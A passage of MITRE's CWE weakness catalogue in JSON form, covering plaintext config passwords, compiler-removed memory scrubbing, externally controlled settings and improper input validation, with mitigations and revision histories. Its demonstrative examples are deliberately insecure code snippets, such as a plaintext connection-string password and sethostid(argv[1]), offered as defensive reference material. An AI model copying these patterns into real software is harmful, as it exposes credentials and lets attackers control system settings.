Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Missing Custom Error Handling","attr":{"@_Date":"2009-03-10"}}}},"13":{"attr":{"@_ID":"13","@_Name":"ASP.NET Misconfiguration: Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Credentials stored in configuration files should be encrypted, Use standard APIs and industry accepted algorithms to encrypt the credentials stored in configuration files."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database, but the pair is stored in plaintext.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"...&lt;connectionStrings&gt;&lt;/connectionStrings&gt;...","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;add name=\\"ud_DEV\\" connectionString=\\"connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;\\" providerName=\\"System.Data.Odbc\\" /&gt;","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Username and password information should not be included in a configuration file or a properties file in plaintext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"ASP.NET Misconfiguration: Password in Configuration File"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-103"}},{"attr":{"@_External_Reference_ID":"REF-104"}},{"attr":{"@_External_Reference_ID":"REF-105"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"14":{"attr":{"@_ID":"14","@_Name":"Compiler Removal of Code to Clear Buffers","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka \\"dead store removal.\\"","Extended_Description":{"xhtml:p":"This compiler optimization error occurs when:","xhtml:ul":{"xhtml:li":["1. Secret data are stored in memory.","2. The secret data are scrubbed from memory by overwriting its contents.","3. The source code is compiled using an optimizing compiler, which identifies and removes the function that overwrites the contents as a dead store because the memory is not used subsequently."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"733","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Build and Compilation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Memory","Bypass Protection Mechanism"],"Note":"This weakness will allow data that has not been cleared from memory to be read. If this data contains sensitive password information, then an attacker can read the password and use the information to bypass protection mechanisms."}},"Detection_Methods":{"Detection_Method":[{"Method":"Black Box","Description":"This specific weakness is impossible to detect using black box methods. While an analyst could examine memory to see that it has not been scrubbed, an analysis of the executable would not be successful. This is because the compiler has already removed the relevant code. Only the source code shows whether the programmer intended to clear the memory or not, so this weakness is indistinguishable from others."},{"Method":"White Box","Description":"This weakness is only detectable using white box methods (see black box detection factor). Careful analysis is required to determine if the code is likely to be removed by the compiler."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Store the sensitive data in a \\"volatile\\" memory location if available."},{"Phase":"Build and Compilation","Description":"If possible, configure your compiler so that it does not remove dead stores."},{"Phase":"Architecture and Design","Description":"Where possible, encrypt sensitive data that are used by a software system."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code reads a password from the user, uses the password to connect to a back-end mainframe and then attempts to scrub the password from memory using memset().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void GetData(char *MFAddr) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char pwd[64];if (GetPasswordFromUser(pwd, sizeof(pwd))) {}memset(pwd, 0, sizeof(pwd));","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (ConnectToMainframe(MFAddr, pwd)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Interaction with mainframe"}}}}}}}},"Body_Text":["The code in the example will behave correctly if it is executed verbatim, but if the code is compiled using an optimizing compiler, such as Microsoft Visual C++ .NET or GCC 3.x, then the call to memset() will be removed as a dead store because the buffer pwd is not used after its value is overwritten [18]. Because the buffer pwd contains a sensitive value, the application may be vulnerable to attack if the data are left memory resident. If attackers are able to access the correct region of memory, they may use the recovered password to gain control of the system.","It is common practice to overwrite sensitive data manipulated in memory, such as passwords or cryptographic keys, in order to prevent attackers from learning system secrets. However, with the advent of optimizing compilers, programs do not always behave as their source code alone would suggest. In the example, the compiler interprets the call to memset() as dead code because the memory being written to is not subsequently used, despite the fact that there is clearly a security motivation for the operation to occur. The problem here is that many compilers, and in fact many programming languages, do not take this and other security concerns into consideration in their efforts to improve efficiency.","Attackers typically exploit this type of vulnerability by using a core dump or runtime mechanism to access the memory used by a particular application and recover the secret information. Once an attacker has access to the secret information, it is relatively straightforward to further exploit the system and possibly compromise other resources with which the application interacts."]}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Compiler Optimization"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Sensitive memory uncleared by compiler optimization"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC06-C","Entry_Name":"Be aware of compiler optimization when dealing with sensitive data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 9, &#34;A Compiler Optimization Caveat&#34; Page 322"}},{"attr":{"@_External_Reference_ID":"REF-124"}},{"attr":{"@_External_Reference_ID":"REF-125"}},{"attr":{"@_External_Reference_ID":"REF-126"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Insecure Compiler Optimization","attr":{"@_Date":"2008-04-11"}}}},"15":{"attr":{"@_ID":"15","@_Name":"External Control of System or Configuration Setting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"One or more system settings or configuration elements can be externally controlled by a user.","Extended_Description":"Allowing external control of system settings can disrupt service or cause an application to behave in unexpected, and potentially malicious ways.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Setting manipulation vulnerabilities occur when an attacker can control values that govern the behavior of the system, manage specific resources, or in some way affect the functionality of the application."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}},{"Phase":["Implementation","Architecture and Design"],"Description":"Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control."},{"Phase":["Implementation","Architecture and Design"],"Description":"In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...sethostid(argv[1]);...","xhtml:br":["",""]}},"Body_Text":"Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior."},{"Intro_Text":"The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...conn.setCatalog(request.getParameter(\\"catalog\\"));...","xhtml:br":["",""]}},"Body_Text":"In this example, an attacker could cause an error by providing a nonexistent catalog name or connect to an unauthorized portion of the database."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Setting Manipulation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"146"}},{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"203"}},{"attr":{"@_CAPEC_ID":"270"}},{"attr":{"@_CAPEC_ID":"271"}},{"attr":{"@_CAPEC_ID":"69"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"77"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Setting Manipulation","attr":{"@_Date":"2008-04-11"}}}},"20":{"attr":{"@_ID":"20","@_Name":"Improper Input Validation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product receives input or data, but it does\\n        not validate or incorrectly validates that the input has the\\n        properties that are required to process the data safely and\\n        correctly.","Extended_Description":{"xhtml:p":["Input validation is a frequently-used technique\\n\\t   for checking potentially dangerous inputs in order to\\n\\t   ensure that the inputs are safe for processing within the\\n\\t   code, or when communicating with other components.  When\\n\\t   software does not validate input properly, an attacker is\\n\\t   able to craft the input in a form that is not expected by\\n\\t   the rest of the application. This will lead to parts of the\\n\\t   system receiving unintended input, which may result in\\n\\t   altered control flow, arbitrary control of a resource, or\\n\\t   arbitrary code execution.","Input validation is not the only technique for\\n\\t   processing input, however.  Other techniques attempt to\\n\\t   transform potentially-dangerous input into something safe, such\\n\\t   as filtering (CWE-790) - which attempts to remove dangerous\\n\\t   inputs - or encoding/escaping (CWE-116), which attempts to\\n\\t   ensure that the input is not misinterpreted when it is included\\n\\t   in output to another component. Other techniques exist as well\\n\\t   (see CWE-138 for more examples.)","Input validation can be applied to:","Data can be simple or structured.  Structured data\\n\\t   can be composed of many nested layers, composed of\\n\\t   combinations of metadata and raw data, with other simple or\\n\\t   structured data.","Many properties of raw data or metadata may need\\n\\t   to be validated upon entry into the code, such\\n\\t   as:","Implied or derived properties of data must often\\n\\t   be calculated or inferred by the code itself.  Errors in\\n\\t   deriving properties may be considered a contributing factor\\n\\t   to improper input validation.","Note that \\"input validation\\" has very different\\n\\t   meanings to different people, or within different\\n\\t   classification schemes.  Caution must be used when\\n\\t   referencing this CWE entry or mapping to it.  For example,\\n\\t   some weaknesses might involve inadvertently giving control\\n\\t   to an attacker over an input when they should not be able\\n\\t   to provide an input at all, but sometimes this is referred\\n\\t   to as input validation.","Finally, it is important to emphasize that the\\n\\t   distinctions between input validation and output escaping\\n\\t   are often blurred, and developers must be careful to\\n\\t   understand the difference, including how input validation\\n\\t   is not always sufficient to prevent vulnerabilities,\\n\\t   especially when less stringent data types must be\\n\\t   supported, such as free-form text. Consider a SQL injection\\n\\t   scenario in which a person\'s last name is inserted into a\\n\\t   query. The name \\"O\'Reilly\\" would likely pass the validation\\n\\t   step since it is a common last name in the English\\n\\t   language. However, this valid name cannot be directly\\n\\t   inserted into the database because it contains the \\"\'\\"\\n\\t   apostrophe character, which would need to be escaped or\\n\\t   otherwise transformed. In this case, removing the\\n\\t   apostrophe might reduce the risk of SQL injection, but it\\n\\t   would produce incorrect behavior because the wrong name\\n\\t   would be recorded."],"xhtml:ul":[{"xhtml:li":["raw data - strings, numbers, parameters, file contents, etc.","metadata - information about the raw data, such as headers or size"]},{"xhtml:li":["specified quantities such as size, length, frequency, price, rate, number of operations, time, etc.","implied or derived quantities, such as the actual size of a file instead of a specified size","indexes, offsets, or positions into more complex data structures","symbolic keys or other elements into hash tables, associative arrays, etc.","well-formedness, i.e. syntactic correctness - compliance with expected syntax","lexical token correctness - compliance with rules for what is treated as a token","specified or derived type - the actual type of the input (or what the input appears to be)","consistency - between individual data elements, between raw data and metadata, between references, etc.","conformance to domain-specific rules, e.g. business logic","equivalence - ensuring that equivalent inputs are treated the same","authenticity, ownership, or other attestations about the input, e.g. a cryptographic signature to prove the source of the data"]}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"74","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"770","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":{"xhtml:p":["REALIZATION: This weakness is caused during implementation of an architectural security tactic.","If a programmer believes that an attacker cannot modify certain inputs, then the programmer might not perform any input validation at all. For example, in web applications, many programmers believe that cookies and hidden form fields can not be modified from a web browser (CWE-472), although they can be altered using a proxy or a custom program. In a client-server architecture, the programmer might assume that client-side security checks cannot be bypassed, even when a custom client could be written that skips those checks (CWE-602)."]}}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"An attacker could provide unexpected values and cause a program crash or excessive consumption of resources, such as memory and CPU."},{"Scope":"Confidentiality","Impact":["Read Memory","Read Files or Directories"],"Note":"An attacker could read confidential data if they are able to control resource references."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"An attacker could use malicious input to modify data or possibly alter control flow in unexpected ways, including arbitrary command execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-3"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Some instances of improper input validation can be detected using automated static analysis.","A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.","Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}},{"attr":{"@_Detection_Method_ID":"DM-4"},"Method":"Manual Static Analysis","Description":"When custom input validation is required, such as when enforcing business rules, manual analysis is necessary to ensure that the validation is properly implemented."},{"attr":{"@_Detection_Method_ID":"DM-5"},"Method":"Fuzzing","Description":"Fuzzing techniques can be useful for detecting input validation errors. When unexpected inputs are provided to the software, the software should not crash or otherwise become unstable, and it should generate application-controlled error messages. If exceptions or interpreter-generated error messages occur, this indicates that the input was not detected and handled within the application logic itself."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Host Application Interface Scanner","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build \\"recognizers\\" for that language.  This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]"},{"attr":{"@_Mitigation_ID":"MIT-7"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself 